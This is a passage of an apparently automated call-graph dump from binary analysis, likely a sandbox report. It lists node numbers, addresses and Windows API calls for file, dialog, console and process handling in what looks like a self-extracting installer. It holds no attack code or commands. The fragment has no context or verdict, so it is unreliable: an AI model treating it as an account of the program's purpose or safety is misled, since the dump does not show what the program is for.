23297 118835 8 API calls 23299 11d76a DialogBoxParamW 23297->23299 23298 11d67c 23298->23292 23300 11d7a4 23299->23300 23301 11d7b6 Sleep 23300->23301 23302 11d7bd 23300->23302 23301->23302 23303 11d7cb 23302->23303 23641 11a544 CompareStringW SetCurrentDirectoryW ___scrt_fastfail 23302->23641 23305 11d7ea DeleteObject 23303->23305 23306 11d7ff DeleteObject 23305->23306 23307 11d806 23305->23307 23306->23307 23308 11d837 23307->23308 23309 11d849 23307->23309 23642 11d2e6 6 API calls 23308->23642 23635 11a39d 23309->23635 23312 11d83d CloseHandle 23312->23309 23313 11d883 23314 12757e GetModuleHandleW 23313->23314 23315 11ebcf 23314->23315 23315->23234 23316 1276a7 23315->23316 23850 127424 23316->23850 23319->23216 23320->23223 23321->23236 23322->23222 23323->23242 23325 12201b ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 23324->23325 23337 12310e 23325->23337 23328 122029 23328->23244 23330 122031 23331 12203c 23330->23331 23351 12314a DeleteCriticalSection 23330->23351 23331->23244 23379 12b73a 23333->23379 23336 12203f 8 API calls 3 library calls 23336->23249 23340 123117 23337->23340 23339 123140 23357 12314a DeleteCriticalSection 23339->23357 23340->23339 23341 122025 23340->23341 23352 123385 23340->23352 23341->23328 23343 12215c 23341->23343 23372 12329a 23343->23372 23345 122166 23346 122171 23345->23346 23377 123348 6 API calls try_get_function 23345->23377 23346->23330 23348 12217f 23349 12218c 23348->23349 23378 12218f 6 API calls ___vcrt_FlsFree 23348->23378 23349->23330 23351->23328 23358 123179 23352->23358 23355 1233bc InitializeCriticalSectionAndSpinCount 23356 1233a8 23355->23356 23356->23340 23357->23341 23359 1231ad 23358->23359 23360 1231a9 23358->23360 23359->23355 23359->23356 23360->23359 23364 1231cd 23360->23364 23365 123219 23360->23365 23362 1231d9 GetProcAddress 23363 1231e9 __crt_fast_encode_pointer 23362->23363 23363->23359 23364->23359 23364->23362 23366 123241 LoadLibraryExW 23365->23366 23367 123236 23365->23367 23368 123275 23366->23368 23369 12325d GetLastError 23366->23369 23367->23360 23368->23367 23371 12328c FreeLibrary 23368->23371 23369->23368 23370 123268 LoadLibraryExW 23369->23370 23370->23368 23371->23367 23373 123179 try_get_function 5 API calls 23372->23373 23374 1232b4 23373->23374 23375 1232cc TlsAlloc 23374->23375 23376 1232bd 23374->23376 23376->23345 23377->23348 23378->23346 23382 12b757 23379->23382 23383 12b753 23379->23383 23380 11ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23381 11e5ee 23380->23381 23381->23247 23381->23336 23382->23383 23385 129e60 23382->23385 23383->23380 23386 129e6c ___scrt_is_nonwritable_in_current_image 23385->23386 23397 12a3f1 EnterCriticalSection 23386->23397 23388 129e73 23398 12bc39 23388->23398 23390 129e82 23391 129e91 23390->23391 23411 129ce9 29 API calls 23390->23411 23413 129ead LeaveCriticalSection _abort 23391->23413 23394 129e8c 23412 129d9f GetStdHandle GetFileType 23394->23412 23395 129ea2 ___scrt_is_nonwritable_in_current_image 23395->23382 23397->23388 23399 12bc45 ___scrt_is_nonwritable_in_current_image 23398->23399 23400 12bc52 23399->23400 23401 12bc69 23399->23401 23422 12895a 20 API calls __dosmaperr 23400->23422 23414 12a3f1 EnterCriticalSection 23401->23414 23404 12bc57 23423 128839 26 API calls pre_c_initialization 23404->23423 23406 12bca1 23424 12bcc8 LeaveCriticalSection _abort 23406->23424 23407 12bc61 ___scrt_is_nonwritable_in_current_image 23407->23390 23410 12bc75 23410->23406 23415 12bb8a 23410->23415 23411->23394 23412->23391 23413->23395 23414->23410 23416 1285a9 pre_c_initialization 20 API calls 23415->23416 23419 12bb9c 23416->23419 23417 12bba9 23418 1284de _free 20 API calls 23417->23418 23420 12bbfb 23418->23420 23419->23417 23421 12a6ca 11 API calls 23419->23421 23420->23410 23421->23419 23422->23404 23423->23407 23424->23407 23426 11f033 GetStartupInfoW 23425->23426 23426->23261 23428 12b2a2 23427->23428 23429 12b299 23427->23429 23428->23266 23432 12b188 23429->23432 23431->23266 23433 128fa5 pre_c_initialization 38 API calls 23432->23433 23434 12b195 23433->23434 23452 12b2ae 23434->23452 23436 12b19d 23461 12af1b 23436->23461 23439 12b1b4 23439->23428 23440 128518 __vswprintf_c_l 21 API calls 23441 12b1c5 23440->23441 23442 12b1f7 23441->23442 23468 12b350 23441->23468 23444 1284de _free 20 API calls 23442->23444 23444->23439 23446 12b1f2 23478 12895a 20 API calls __dosmaperr 23446->23478 23448 12b23b 23448->23442 23479 12adf1 26 API calls 23448->23479 23449 12b20f 23449->23448 23450 1284de _free 20 API calls 23449->23450 23450->23448 23453 12b2ba ___scrt_is_nonwritable_in_current_image 23452->23453 23454 128fa5 pre_c_initialization 38 API calls 23453->23454 23455 12b2c4 23454->23455 23458 12b348 ___scrt_is_nonwritable_in_current_image 23455->23458 23460 1284de _free 20 API calls 23455->23460 23480 128566 38 API calls _abort 23455->23480 23481 12a3f1 EnterCriticalSection 23455->23481 23482 12b33f LeaveCriticalSection _abort 23455->23482 23458->23436 23460->23455 23462 123dd6 __fassign 38 API calls 23461->23462 23463 12af2d 23462->23463 23464 12af4e 23463->23464 23465 12af3c GetOEMCP 23463->23465 23466 12af65 23464->23466 23467 12af53 GetACP 23464->23467 23465->23466 23466->23439 23466->23440 23467->23466 23469 12af1b 40 API calls 23468->23469 23470 12b36f 23469->23470 23473 12b3c0 IsValidCodePage 23470->23473 23475 12b376 23470->23475 23477 12b3e5 ___scrt_fastfail 23470->23477 23471 11ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23472 12b1ea 23471->23472 23472->23446 23472->23449 23474 12b3d2 GetCPInfo 23473->23474 23473->23475 23474->23475 23474->23477 23475->23471 23483 12aff4 GetCPInfo 23477->23483 23478->23442 23479->23442 23481->23455 23482->23455 23484 12b0d8 23483->23484 23489 12b02e 23483->23489 23486 11ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23484->23486 23488 12b184 23486->23488 23488->23475 23493 12c099 23489->23493 23492 12a275 __vswprintf_c_l 43 API calls 23492->23484 23494 123dd6 __fassign 38 API calls 23493->23494 23495 12c0b9 MultiByteToWideChar 23494->23495 23497 12c18f 23495->23497 23498 12c0f7 23495->23498 23499 11ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23497->23499 23500 128518 __vswprintf_c_l 21 API calls 23498->23500 23503 12c118 __vsnwprintf_l ___scrt_fastfail 23498->23503 23501 12b08f 23499->23501 23500->23503 23507 12a275 23501->23507 23502 12c189 23512 12a2c0 20 API calls _free 23502->23512 23503->23502 23505 12c15d MultiByteToWideChar 23503->23505 23505->23502 23506 12c179 GetStringTypeW 23505->23506 23506->23502 23508 123dd6 __fassign 38 API calls 23507->23508 23509 12a288 23508->23509 23513 12a058 23509->23513 23512->23497 23515 12a073 __vswprintf_c_l 23513->23515 23514 12a099 MultiByteToWideChar 23516 12a0c3 23514->23516 23517 12a24d 23514->23517 23515->23514 23522 128518 __vswprintf_c_l 21 API calls 23516->23522 23524 12a0e4 __vsnwprintf_l 23516->23524 23518 11ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23517->23518 23519 12a260 23518->23519 23519->23492 23520 12a199 23549 12a2c0 20 API calls _free 23520->23549 23521 12a12d MultiByteToWideChar 23521->23520 23523 12a146 23521->23523 23522->23524 23540 12a72c 23523->23540 23524->23520 23524->23521 23528 12a170 23528->23520 23531 12a72c __vswprintf_c_l 11 API calls 23528->23531 23529 12a1a8 23530 128518 __vswprintf_c_l 21 API calls 23529->23530 23534 12a1c9 __vsnwprintf_l 23529->23534 23530->23534 23531->23520 23532 12a23e 23548 12a2c0 20 API calls _free 23532->23548 23534->23532 23535 12a72c __vswprintf_c_l 11 API calls 23534->23535 23536 12a21d 23535->23536 23536->23532 23537 12a22c WideCharToMultiByte 23536->23537 23537->23532 23538 12a26c 23537->23538 23550 12a2c0 20 API calls _free 23538->23550 23541 12a458 pre_c_initialization 5 API calls 23540->23541 23542 12a753 23541->23542 23545 12a75c 23542->23545 23551 12a7b4 10 API calls 3 library calls 23542->23551 23544 12a79c LCMapStringW 23544->23545 23546 11ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23545->23546 23547 12a15d 23546->23547 23547->23520 23547->23528 23547->23529 23548->23520 23549->23517 23550->23520 23551->23544 23553 11e360 23552->23553 23554 1100d9 GetModuleHandleW 23553->23554 23555 1100f0 GetProcAddress 23554->23555 23556 110154 23554->23556 23557 110121 GetProcAddress 23555->23557 23558 110109 23555->23558 23559 110484 GetModuleFileNameW 23556->23559 23652 1270dd 42 API calls __vsnwprintf_l 23556->23652 23557->23556 23560 110133 23557->23560 23558->23557 23572 1104a3 23559->23572 23560->23556 23562 1103be 23562->23559 23563 1103c9 GetModuleFileNameW CreateFileW 23562->23563 23564 110478 CloseHandle 23563->23564 23565 1103fc SetFilePointer 23563->23565 23564->23559 23565->23564 23566 11040c ReadFile 23565->23566 23566->23564 23569 11042b 23566->23569 23569->23564 23571 110085 2 API calls 23569->23571 23570 1104d2 CompareStringW 23570->23572 23571->23569 23572->23570 23573 110508 GetFileAttributesW 23572->23573 23574 110520 23572->23574 23643 10acf5 23572->23643 23646 110085 23572->23646 23573->23572 23573->23574 23575 11052a 23574->23575 23578 110560 23574->23578 23577 110542 GetFileAttributesW 23575->23577 23579 11055a 23575->23579 23576 11066f 23600 119da4 GetCurrentDirectoryW 23576->23600 23577->23575 23577->23579 23578->23576 23580 10acf5 GetVersionExW 23578->23580 23579->23578 23581 11057a 23580->23581 23582 110581 23581->23582 23583 1105e7 23581->23583 23585 110085 2 API calls 23582->23585 23584 10400a _swprintf 51 API calls 23583->23584 23586 11060f AllocConsole 23584->23586 23587 11058b 23585->23587 23589 110667 ExitProcess 23586->23589 23590 11061c GetCurrentProcessId AttachConsole 23586->23590 23588 110085 2 API calls 23587->23588 23591 110595 23588->23591 23656 1235b3 23590->23656 23653 10ddd1 23591->23653 23594 11063d GetStdHandle WriteConsoleW Sleep FreeConsole 23594->23589 23596 10400a _swprintf 51 API calls 23597 1105c3 23596->23597 23598 10ddd1 53 API calls 23597->23598 23599 1105d2 23598->23599 23599->23589 23600->23271 23602 110085 2 API calls 23601->23602 23603 11a349 OleInitialize 23602->23603 23604 11a36c GdiplusStartup SHGetMalloc 23603->23604 23604->23273 23606 1113d7 IsDBCSLeadByte 23605->23606 23606->23606 23607 1113ef 23606->23607 23607->23275 23609 11ae15 23608->23609 23610 11ae0e 23608->23610 23612 11ae1b GetObjectW 23609->23612 23613 11ae2a 23609->23613 23686 119e1c FindResourceW 23610->23686 23612->23613 23681 119d1a 23613->23681 23615 11ae80 23627 10d31c 23615->23627 23617 11ae5c 23702 119d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23617->23702 23618 119e1c 13 API calls 23620 11ae4d 23618->23620 23620->23617 23622 11ae53 DeleteObject 23620->23622 23621 11ae64 23703 119d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23621->23703 23622->23617 23624 11ae6d 23704 119f5d 8 API calls ___scrt_fastfail 23624->23704 23626 11ae74 DeleteObject 23626->23615 23715 10d341 23627->23715 23629 10d328 23755 10da4e GetModuleHandleW FindResourceW 23629->23755 23632 118835 23841 11e24a 23632->23841 23636 11a3cc GdiplusShutdown CoUninitialize 23635->23636 23636->23313 23638->23282 23639->23298 23640->23277 23641->23303 23642->23312 23644 10ad09 GetVersionExW 23643->23644 23645 10ad45 23643->23645 23644->23645 23645->23572 23647 11e360 23646->23647 23648 110092 GetSystemDirectoryW 23647->23648 23649 1100c8 23648->23649 23650 1100aa 23648->23650 23649->23572 23651 1100bb LoadLibraryW 23650->23651 23651->23649 23652->23562 23658 10ddff 23653->23658 23657 1235bb 23656->23657 23657->23594 23657->23657 23664 10d28a 23658->23664 23661 10de22 LoadStringW 23662 10ddfc 23661->23662 23663 10de39 LoadStringW 23661->23663 23662->23596 23663->23662 23669 10d1c3 23664->23669 23666 10d2a7 23668 10d2bc 23666->23668 23677 10d2c8 26 API calls 23666->23677 23668->23661 23668->23662 23670 10d1de 23669->23670 23676 10d1d7 _strncpy 23669->23676 23672 10d202 23670->23672 23678 111596 WideCharToMultiByte 23670->23678 23675 10d233 23672->23675 23679 10dd6b 50 API calls __vsnprintf 23672->23679 23680 1258d9 26 API calls 3 library calls 23675->23680 23676->23666 23677->23668 23678->23672 23679->23675 23680->23676 23705 119d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23681->23705 23683 119d21 23684 119d2d 23683->23684 23706 119d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23683->23706 23684->23615 23684->23617 23684->23618 23687 119e70 23686->23687 23688 119e3e SizeofResource 23686->23688 23687->23609 23688->23687 23689 119e52 LoadResource 23688->23689 23689->23687 23690 119e63 LockResource 23689->23690 23690->23687 23691 119e77 GlobalAlloc 23690->23691 23691->23687 23692 119e92 GlobalLock 23691->23692 23693 119f21 GlobalFree 23692->23693 23694 119ea1 __vsnwprintf_l 23692->23694 23693->23687 23695 119ea9 CreateStreamOnHGlobal 23694->23695 23696 119ec1 23695->23696 23697 119f1a GlobalUnlock 23695->23697 23707 119d7b GdipAlloc 23696->23707 23697->23693 23700 119f05 23700->23697 23701 119eef GdipCreateHBITMAPFromBitmap 23701->23700 23702->23621 23703->23624 23704->23626 23705->23683 23706->23684 23708 119d8d 23707->23708 23709 119d9a 23707->23709 23711 119b0f 23708->23711 23709->23697 23709->23700 23709->23701 23712 119b30 GdipCreateBitmapFromStreamICM 23711->23712 23713 119b37 GdipCreateBitmapFromStream 23711->23713 23714 119b3c 23712->23714 23713->23714 23714->23709 23716 10d34b _wcschr __EH_prolog 23715->23716 23717 10d37a GetModuleFileNameW 23716->23717 23718 10d3ab 23716->23718 23719 10d394 23717->23719 23757 1099b0 23718->23757 23719->23718 23722 10d407 23768 125a90 26 API calls 3 library calls 23722->23768 23725 113781 76 API calls 23727 10d3db 23725->23727 23726 10d41a 23769 125a90 26 API calls 3 library calls 23726->23769 23727->23722 23727->23725 23739 10d627 23727->23739 23729 10d563 23729->23739 23794 109d30 77 API calls 23729->23794 23733 10d57d ___std_exception_copy 23734 109bf0 80 API calls 23733->23734 23733->23739 23737 10d5a6 ___std_exception_copy 23734->23737 23736 10d42c 23736->23729 23736->23739 23770 109e40 23736->23770 23785 109bf0 23736->23785 23793 109d30 77 API calls 23736->23793 23737->23739 23752 10d5b2 ___std_exception_copy 23737->23752 23795 11137a MultiByteToWideChar 23737->23795 23778 109653 23739->23778 23740 10d72b 23796 10ce72 76 API calls 23740->23796 23742 10da0a 23801 10ce72 76 API calls 23742->23801 23744 10d9fa 23744->23629 23745 10d771 23797 125a90 26 API calls 3 library calls 23745->23797 23747 10d742 23747->23745 23749 113781 76 API calls 23747->23749 23748 10d78b 23798 125a90 26 API calls 3 library calls 23748->23798 23749->23747 23751 111596 WideCharToMultiByte 23751->23752 23752->23739 23752->23740 23752->23742 23752->23744 23752->23751 23799 10dd6b 50 API calls __vsnprintf 23752->23799 23800 1258d9 26 API calls 3 library calls 23752->23800 23756 10d32f 23755->23756 23756->23632 23758 1099ba 23757->23758 23759 109a39 CreateFileW 23758->23759 23760 109a59 GetLastError 23759->23760 23765 109aaa 23759->23765 23761 10b66c 2 API calls 23760->23761 23762 109a79 23761->23762 23762->23765 23766 109a7d CreateFileW GetLastError 23762->23766 23763 109ac7 SetFileTime 23764 109ae1 23763->23764 23764->23727 23765->23763 23765->23764 23767 109aa1 23766->23767 23767->23765 23768->23726 23769->23736 23771 109e53 23770->23771 23772 109e64 SetFilePointer 23770->23772 23775 109e9d 23771->23775 23802 106fa5 75 API calls 23771->23802 23773 109e82 GetLastError 23772->23773 23772->23775 23773->23775 23776 109e8c 23773->23776 23775->23736 23776->23775 23803 106fa5 75 API calls 23776->23803 23779 109677 23778->23779 23780 109688 23778->23780 23779->23780 23781 109683 23779->23781 23782 10968a 23779->23782 23780->23629 23804 109817 23781->23804 23809 1096d0 23782->23809 23786 109bfc 23785->23786 23789 109c03 23785->23789 23786->23736 23788 109c9e 23788->23786 23836 106f6b 75 API calls 23788->23836 23789->23786 23789->23788 23791 109cc0 23789->23791 23824 10984e 23789->23824 23791->23786 23792 10984e 5 API calls 23791->23792 23792->23791 23793->23736 23794->23733 23795->23752 23796->23747 23797->23748 23798->23739 23799->23752 23800->23752 23801->23744 23802->23772 23803->23775 23805 109820 23804->23805 23806 109824 23804->23806 23805->23780 23806->23805 23815 10a12d 23806->23815 23810 1096dc 23809->23810 23811 1096fa 23809->23811 23810->23811 23813 1096e8 CloseHandle 23810->23813 23812 109719 23811->23812 23823 106e3e 74 API calls 23811->23823 23812->23780 23813->23811 23816 11e360 23815->23816 23817 10a13a DeleteFileW 23816->23817 23818 10984c 23817->23818 23819 10a14d 23817->23819 23818->23780 23820 10b66c 2 API calls 23819->23820 23821 10a161 23820->23821 23821->23818 23822 10a165 DeleteFileW 23821->23822 23822->23818 23823->23812 23825 109867 ReadFile 23824->23825 23826 10985c GetStdHandle 23824->23826 23827 109880 23825->23827 23833 1098a0 23825->23833 23826->23825 23837 109989 23827->23837 23829 109887 23830 1098b7 23829->23830 23831 1098a8 GetLastError 23829->23831 23832 109895 23829->23832 23830->23833 23835 1098c7 GetLastError 23830->23835 23831->23830 23831->23833 23834 10984e GetFileType 23832->23834 23833->23789 23834->23833 23835->23832 23835->23833 23836->23786 23838 109992 GetFileType 23837->23838 23839 10998f 23837->23839 23840 1099a0 23838->23840 23839->23829 23840->23829 23843 11e24f ___std_exception_copy 23841->23843 23842 118854 23842->23297 23843->23842 23847 1271ad 7 API calls 2 library calls 23843->23847 23848 11ecce RaiseException CallUnexpected new 23843->23848 23849 11ecb1 RaiseException Concurrency::cancel_current_task CallUnexpected 23843->23849 23847->23843 23851 127430 _abort 23850->23851 23852 127448 23851->23852 23853 12757e _abort GetModuleHandleW 23851->23853 23872 12a3f1 EnterCriticalSection 23852->23872 23855 12743c 23853->23855 23855->23852 23884 1275c2 GetModuleHandleExW 23855->23884 23859 127537 23893 131a19 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 23859->23893 23860 12750b 23876 12753d 23860->23876 23864 1281f1 _abort 5 API calls 23869 1274dd 23864->23869 23865 1281f1 _abort 5 API calls 23870 1274ee 23865->23870 23866 127450 23867 1274c5 23866->23867 23866->23870 23892 127f30 20 API calls _abort 23866->23892 23867->23864 23867->23869 23869->23865 23873 12752e 23870->23873 23872->23866 23894 12a441 LeaveCriticalSection 23873->23894 23875 127507 23875->23859 23875->23860 23895 12a836 23876->23895 23879 12756b 23882 1275c2 _abort 8 API calls 23879->23882 23880 12754b GetPEB 23880->23879 23881 12755b GetCurrentProcess TerminateProcess 23880->23881 23881->23879 23883 127573 ExitProcess 23882->23883 23885 12760f 23884->23885 23886 1275ec GetProcAddress 23884->23886 23887 127615 FreeLibrary 23885->23887 23888 12761e 23885->23888 23889 127601 23886->23889 23887->23888 23890 11ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23888->23890 23889->23885 23891 127628 23890->23891 23891->23852 23892->23867 23894->23875 23896 12a85b 23895->23896 23900 12a851 23895->23900 23897 12a458 pre_c_initialization 5 API calls 23896->23897 23897->23900 23898 11ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23899 127547 23898->23899 23899->23879 23899->23880 23900->23898 23901 1010d5 23906 105bd7 23901->23906 23907 105be1 __EH_prolog 23906->23907 23913 10b07d 23907->23913 23909 105bed 23919 105dcc GetCurrentProcess GetProcessAffinityMask 23909->23919 23914 10b087 __EH_prolog 23913->23914 23920 10ea80 80 API calls 23914->23920 23916 10b099 23921 10b195 23916->23921 23920->23916 23922 10b1a7 ___scrt_fastfail 23921->23922 23925 110948 23922->23925 23928 110908 GetCurrentProcess GetProcessAffinityMask 23925->23928 23929 10b10f 23928->23929 23929->23909 24822 11eac0 27 API calls pre_c_initialization 24867 1197c0 10 API calls 24824 129ec0 21 API calls 24868 12b5c0 GetCommandLineA GetCommandLineW 24825 11a8c2 GetDlgItem EnableWindow ShowWindow SendMessageW 24869 12ebc1 21 API calls __vswprintf_c_l 24874 11ebf7 20 API calls 23969 11e1f9 23970 11e203 23969->23970 23971 11df59 ___delayLoadHelper2@8 19 API calls 23970->23971 23972 11e210 23971->23972 24875 12abfd 6 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 23976 11aee0 23977 11aeea __EH_prolog 23976->23977 24139 10130b 23977->24139 23980 11b5cb 24204 11cd2e 23980->24204 23981 11af2c 23983 11afa2 23981->23983 23984 11af39 23981->23984 24042 11af18 23981->24042 23990 11b041 GetDlgItemTextW 23983->23990 23994 11afbc 23983->23994 23986 11af75 23984->23986 23987 11af3e 23984->23987 23997 11af96 KiUserCallbackDispatcher 23986->23997 23986->24042 23996 10ddd1 53 API calls 23987->23996 23987->24042 23988 11b5f7 23992 11b611 GetDlgItem SendMessageW 23988->23992 23993 11b600 SendDlgItemMessageW 23988->23993 23989 11b5e9 SendMessageW 23989->23988 23990->23986 23991 11b077 23990->23991 23998 11b08f GetDlgItem 23991->23998 24137 11b080 23991->24137 24222 119da4 GetCurrentDirectoryW 23992->24222 23993->23992 23995 10ddd1 53 API calls 23994->23995 24000 11afde SetDlgItemTextW 23995->24000 24001 11af58 23996->24001 23997->24042 24003 11b0c5 SetFocus 23998->24003 24004 11b0a4 SendMessageW SendMessageW 23998->24004 24006 11afec 24000->24006 24244 101241 SHGetMalloc 24001->24244 24002 11b641 GetDlgItem 24008 11b664 SetWindowTextW 24002->24008 24009 11b65e 24002->24009 24005 11b0d5 24003->24005 24022 11b0ed 24003->24022 24004->24003 24011 10ddd1 53 API calls 24005->24011 24016 11aff9 GetMessageW 24006->24016 24006->24042 24223 11a2c7 GetClassNameW 24008->24223 24009->24008 24015 11b0df 24011->24015 24012 11af5f 24017 11af63 SetDlgItemTextW 24012->24017 24012->24042 24013 11b56b 24018 10ddd1 53 API calls 24013->24018 24245 11cb5a 24015->24245 24021 11b010 IsDialogMessageW 24016->24021 24016->24042 24017->24042 24023 11b57b SetDlgItemTextW 24018->24023 24021->24006 24025 11b01f TranslateMessage DispatchMessageW 24021->24025 24027 10ddd1 53 API calls 24022->24027 24026 11b58f 24023->24026 24025->24006 24028 10ddd1 53 API calls 24026->24028 24030 11b124 24027->24030 24031 11b5b8 24028->24031 24029 11b6af 24035 11b6df 24029->24035 24039 10ddd1 53 API calls 24029->24039 24036 10400a _swprintf 51 API calls 24030->24036 24037 10ddd1 53 API calls 24031->24037 24032 11b0e6 24149 10a04f 24032->24149 24034 11bdf5 98 API calls 24034->24029 24041 11bdf5 98 API calls 24035->24041 24073 11b797 24035->24073 24040 11b136 24036->24040 24037->24042 24046 11b6c2 SetDlgItemTextW 24039->24046 24047 11cb5a 16 API calls 24040->24047 24048 11b6fa 24041->24048 24043 11b847 24049 11b850 EnableWindow 24043->24049 24050 11b859 24043->24050 24044 11b174 GetLastError 24045 11b17f 24044->24045 24155 11a322 SetCurrentDirectoryW 24045->24155 24052 10ddd1 53 API calls 24046->24052 24047->24032 24056 11b70c 24048->24056 24079 11b731 24048->24079 24049->24050 24053 11b876 24050->24053 24263 1012c8 GetDlgItem EnableWindow 24050->24263 24055 11b6d6 SetDlgItemTextW 24052->24055 24061 11b89d 24053->24061 24065 11b895 SendMessageW 24053->24065 24054 11b195 24059 11b1ac 24054->24059 24060 11b19e GetLastError 24054->24060 24055->24035 24261 119635 32 API calls 24056->24261 24057 11b78a 24062 11bdf5 98 API calls 24057->24062 24069 11b237 24059->24069 24070 11b1c4 GetTickCount 24059->24070 24115 11b227 24059->24115 24060->24059 24061->24042 24066 10ddd1 53 API calls 24061->24066 24062->24073 24064 11b86c 24264 1012c8 GetDlgItem EnableWindow 24064->24264 24065->24061 24072 11b8b6 SetDlgItemTextW 24066->24072 24067 11b725 24067->24079 24075 11b407 24069->24075 24076 11b24f GetModuleFileNameW 24069->24076 24077 10400a _swprintf 51 API calls 24070->24077 24071 11b825 24262 119635 32 API calls 24071->24262 24072->24042 24073->24043 24073->24071 24084 10ddd1 53 API calls 24073->24084 24074 11b46c 24164 1012e6 GetDlgItem ShowWindow 24074->24164 24075->23986 24089 10ddd1 53 API calls 24075->24089 24255 10eb3a 80 API calls 24076->24255 24090 11b1dd 24077->24090 24079->24057 24085 11bdf5 98 API calls 24079->24085 24081 11b47c 24165 1012e6 GetDlgItem ShowWindow 24081->24165 24083 11b844 24083->24043 24084->24073 24086 11b75f 24085->24086 24086->24057 24091 11b768 DialogBoxParamW 24086->24091 24088 11b275 24093 10400a _swprintf 51 API calls 24088->24093 24094 11b41b 24089->24094 24156 10971e 24090->24156 24091->23986 24091->24057 24092 11b486 24095 10ddd1 53 API calls 24092->24095 24096 11b297 CreateFileMappingW 24093->24096 24097 10400a _swprintf 51 API calls 24094->24097 24099 11b490 SetDlgItemTextW 24095->24099 24100 11b2f9 GetCommandLineW 24096->24100 24131 11b376 __vsnwprintf_l 24096->24131 24101 11b439 24097->24101 24166 1012e6 GetDlgItem ShowWindow 24099->24166 24105 11b30a 24100->24105 24114 10ddd1 53 API calls 24101->24114 24102 11b203 24106 11b215 24102->24106 24107 11b20a GetLastError 24102->24107 24103 11b381 ShellExecuteExW 24129 11b39e 24103->24129 24256 11ab2e SHGetMalloc 24105->24256 24110 109653 79 API calls 24106->24110 24107->24106 24108 11b4a2 SetDlgItemTextW GetDlgItem 24111 11b4d7 24108->24111 24112 11b4bf GetWindowLongW SetWindowLongW 24108->24112 24110->24115 24167 11bdf5 24111->24167 24112->24111 24113 11b326 24257 11ab2e SHGetMalloc 24113->24257 24114->23986 24115->24069 24115->24074 24119 11b332 24258 11ab2e SHGetMalloc 24119->24258 24120 11b3e1 24120->24075 24125 11b3f7 UnmapViewOfFile CloseHandle 24120->24125 24121 11bdf5 98 API calls 24123 11b4f3 24121->24123 24192 11d0f5 24123->24192 24124 11b33e 24259 10ecad 80 API calls ___scrt_fastfail 24124->24259 24125->24075 24128 11b355 MapViewOfFile 24128->24131 24129->24120 24132 11b3cd Sleep 24129->24132 24131->24103 24132->24120 24132->24129 24133 11bdf5 98 API calls 24136 11b519 24133->24136 24134 11b542 24260 1012c8 GetDlgItem EnableWindow 24134->24260 24136->24134 24138 11bdf5 98 API calls 24136->24138 24137->23986 24137->24013 24138->24134 24140 101314 24139->24140 24141 10136d 24139->24141 24143 10137a 24140->24143 24265 10da98 62 API calls 2 library calls 24140->24265 24266 10da71 GetWindowLongW SetWindowLongW 24141->24266 24143->23980 24143->23981 24143->24042 24145 101336 24145->24143 24146 101349 GetDlgItem 24145->24146 24146->24143 24147 101359 24146->24147 24147->24143 24148 10135f SetWindowTextW 24147->24148 24148->24143 24152 10a059 24149->24152 24150 10a0ea 24151 10a207 9 API calls 24150->24151 24153 10a113 24150->24153 24151->24153 24152->24150 24152->24153 24267 10a207 24152->24267 24153->24044 24153->24045 24155->24054 24157 109728 24156->24157 24158 109792 CreateFileW 24157->24158 24159 109786 24157->24159 24158->24159 24160 1097e4 24159->24160 24161 10b66c 2 API calls 24159->24161 24160->24102 24162 1097cb 24161->24162 24162->24160 24163 1097cf CreateFileW 24162->24163 24163->24160 24164->24081 24165->24092 24166->24108 24168 11bdff __EH_prolog 24167->24168 24169 11aa36 ExpandEnvironmentStringsW 24168->24169 24173 11b4e5 24168->24173 24181 11be36 _wcsrchr 24169->24181 24171 11aa36 ExpandEnvironmentStringsW 24171->24181 24172 11c11d SetWindowTextW 24172->24181 24173->24121 24176 1235de 22 API calls 24176->24181 24178 11bf0b SetFileAttributesW 24180 11bfc5 GetFileAttributesW 24178->24180 24191 11bf25 ___scrt_fastfail 24178->24191 24180->24181 24183 11bfd7 DeleteFileW 24180->24183 24181->24171 24181->24172 24181->24173 24181->24176 24181->24178 24184 11c2e7 GetDlgItem SetWindowTextW SendMessageW 24181->24184 24187 11c327 SendMessageW 24181->24187 24288 1117ac CompareStringW 24181->24288 24289 119da4 GetCurrentDirectoryW 24181->24289 24291 10a52a 7 API calls 24181->24291 24292 10a4b3 FindClose 24181->24292 24293 11ab9a 76 API calls ___std_exception_copy 24181->24293 24183->24181 24185 11bfe8 24183->24185 24184->24181 24186 10400a _swprintf 51 API calls 24185->24186 24188 11c008 GetFileAttributesW 24186->24188 24187->24181 24188->24185 24189 11c01d MoveFileW 24188->24189 24189->24181 24190 11c035 MoveFileExW 24189->24190 24190->24181 24191->24180 24191->24181 24290 10b4f7 52 API calls 2 library calls 24191->24290 24193 11d0ff __EH_prolog 24192->24193 24294 10fead 24193->24294 24195 11d130 24298 105c59 24195->24298 24197 11d14e 24302 107c68 24197->24302 24201 11d1a1 24319 107cfb 24201->24319 24203 11b504 24203->24133 24205 11cd38 24204->24205 24206 119d1a 4 API calls 24205->24206 24207 11cd3d 24206->24207 24208 11cd45 GetWindow 24207->24208 24209 11b5d1 24207->24209 24208->24209 24212 11cd65 24208->24212 24209->23988 24209->23989 24210 11cd72 GetClassNameW 24763 1117ac CompareStringW 24210->24763 24212->24209 24212->24210 24213 11cd96 GetWindowLongW 24212->24213 24214 11cdfa GetWindow 24212->24214 24213->24214 24215 11cda6 SendMessageW 24213->24215 24214->24209 24214->24212 24215->24214 24216 11cdbc GetObjectW 24215->24216 24764 119d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24216->24764 24219 11cdd3 24765 119d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 